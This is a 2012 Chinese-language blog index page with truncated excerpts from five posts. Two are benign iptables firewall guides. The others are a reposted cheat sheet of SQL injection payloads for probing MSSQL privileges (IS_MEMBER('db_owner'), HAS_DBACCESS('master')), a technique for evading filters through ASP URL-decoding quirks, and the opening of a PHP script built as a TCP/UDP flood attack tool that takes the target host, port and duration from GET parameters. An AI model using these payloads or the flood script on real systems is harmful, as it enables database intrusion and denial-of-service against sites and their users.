作者:admin 发布于:2012-8-18 9:46 Saturday
分类:网络转载
18Aug
我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as va...
阅读全文>>
评论(0)
引用(29)
浏览(20315)
作者:admin 发布于:2012-8-18 9:33 Saturday
分类:网络转载
18Aug
先来说URL编码,%加两位的16进制表示一个字符,比如’经过编码之后就是%27,这是人人都知道的URL编码规则,UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想。
然而,我们何必如此听话,试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace,
写
个小程序试一下,abc%hh经过译码还是abc%hh;再看asp.dll是怎么译码的,在asp页面中写入
response.Write(request.QueryString("str")),然后用?str=abc%hh访问它,页面显示
abchh,它直接把%给去掉了。
...
阅读全文>>
评论(0)
引用(61)
浏览(20025)
作者:admin 发布于:2012-8-18 9:19 Saturday
分类:Linux
18Aug
如果你的IPTABLES基础知识还不了解,建议先去看看.
开始配置
我们来配置一个filter表的防火墙.
(1)查看本机关于IPTABLES的设置情况
[root@tp ~]# iptables -L -n
Chain INPUT (policy ACCEPT)
target prot opt source destination  ...
阅读全文>>
标签: iptables
评论(0)
引用(61)
浏览(34293)
作者:admin 发布于:2012-8-18 8:57 Saturday
分类:Linux
18Aug
(1) 重启后永久性生效:
开启:chkconfig iptables on
关闭:chkconfig iptables off
(2) 即时生效,重启后失效:
开启:service iptables start
关闭:service iptables stop
需要说明的是对于Linux下的其它服务都可以用以上命令执行开启和关闭操作。
在开启了防火墙时,做如下设置,开启相关端口,
修改/etc/sysconfig/iptables 文件,添加以下内容:
-A RH-Firewall-1-INPUT -m state ——state NEW -m tcp -p tcp ——dport 80 -j ACCEPT
-A RH-Firewall-1-INPUT -m state ——stat...
阅读全文>>
标签: iptables
评论(0)
引用(51)
浏览(29535)
作者:admin 发布于:2012-8-17 15:11 Friday
分类:PHP
17Aug
<?php
header("charset='utf-8'");//设置编码格式为UTF-8
error_reporting(0);//禁用错误报告
set_time_limit(0);//配置该页最久执行时间。 0为永久执行
ignore_user_abort(false); //设置与客户机断开是否会终止脚本的执行。
/*get参数*/
$type = $_GET['type']; //攻击方式 0为TCP 1为UDP
$host = $_GET['host']; //攻击目标
$port = $_GET['port']; //攻击端口
$exec_time = $_GET['time']; //持续时间
$Sendlen =...
阅读全文>>
标签: PHP fsockopen
评论(0)
引用(33)
浏览(44699)